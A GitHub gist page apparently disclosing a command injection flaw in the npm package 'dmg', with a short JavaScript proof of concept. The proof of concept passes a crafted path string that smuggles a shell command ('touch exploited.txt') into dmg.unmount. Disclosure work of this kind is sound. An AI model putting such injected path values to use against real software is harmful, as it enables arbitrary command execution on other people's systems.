Created
October 26, 2023 18:03
-
-
Save mcoimbra/3a6ea1ead7a5c99c986f6aa89bf7e1dd to your computer and use it in GitHub Desktop.
Package dmg: it is possible to perform command injection by manipulating the 'path' argument which supposedly would contain a valid path to a .dmg file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const dmg = require('dmg'); | |
| const path = '" | touch exploited.txt | echo /Volumes/ "'; | |
| const callback = function() {}; | |
| dmg.unmount(path, callback); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment